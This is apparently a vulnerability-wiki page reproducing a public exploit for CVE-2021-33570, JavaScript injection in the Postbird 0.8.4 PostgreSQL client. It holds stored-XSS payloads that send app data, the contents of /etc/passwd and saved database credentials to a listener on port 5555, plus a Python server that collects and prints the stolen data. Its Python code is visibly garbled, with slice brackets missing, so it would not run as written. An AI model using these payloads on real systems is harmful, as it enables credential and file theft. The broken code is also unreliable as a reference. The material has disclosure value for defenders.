Loading
0

CVE-2021-33570 Postbird 0.8.4 Javascript注入漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

EXP

# Exploit Title: Postbird 0.8.4 - Javascript Injection
# Date: 26 May 2021
# Exploit Author: Debshubra Chakraborty
# Vendor Homepage: https://github.com/paxa/postbird
# Software Link: https://www.electronjs.org/apps/postbird
# Version: 0.8.4 
# Tested on: Linux
# CVE : CVE-2021-33570

"""
XSS Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();">

LFI Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1 :5555/?file='+JSON.stringify(res), true);xhttp.send();">

PostgreSQL Password Stealing Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">

"""

from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.parse
import re

hostName = '0.0.0.0'
serverPort = 5555

class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        parse(urllib.parse.unquote(self.requestline))

    def log_message(self, format, *args):
        return   


def parse(data):
    expression = re.search('\S+=', data)
    attr = expression.group()

    if attr2:len(attr)-1 == 'file':
        data = data12:len(data)-11    
        data = data.rsplit('\\n')
        print(f'\n+ File received from LFI: \n\n')
        for output in data:
            print(output)

    elif attr2:len(attr)-1 == 'xss':
        data = data11:len(data)-10
        print(f'\n+ Data exfiltration from Stored XSS: \n\n{data}')
    
    elif attr2:len(attr)-1 == 'credentials':
        pos = re.search('{"\S+:', data)
        data = datapos.start():len(data)-11
        for i in range(2, len(data), 1):
            if datai == '"':
                pos = i
                break

        host = data2:pos
        data = data14:
        data = data.rsplit(',')
        print(f'\n\n+ The Database credentials received\n\nHost = {host}')
        for output in data:
            print(output)
    
    else:
        print(f'\n\n- Unknown header attribute found, atribute = {attr2:len(attr)-1}')


def main():        
    global hostName, serverPort
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("\nServer stopped.")


if __name__ == "__main__":
    main()

免费、自由、人人可编辑的漏洞库--PwnWiki.com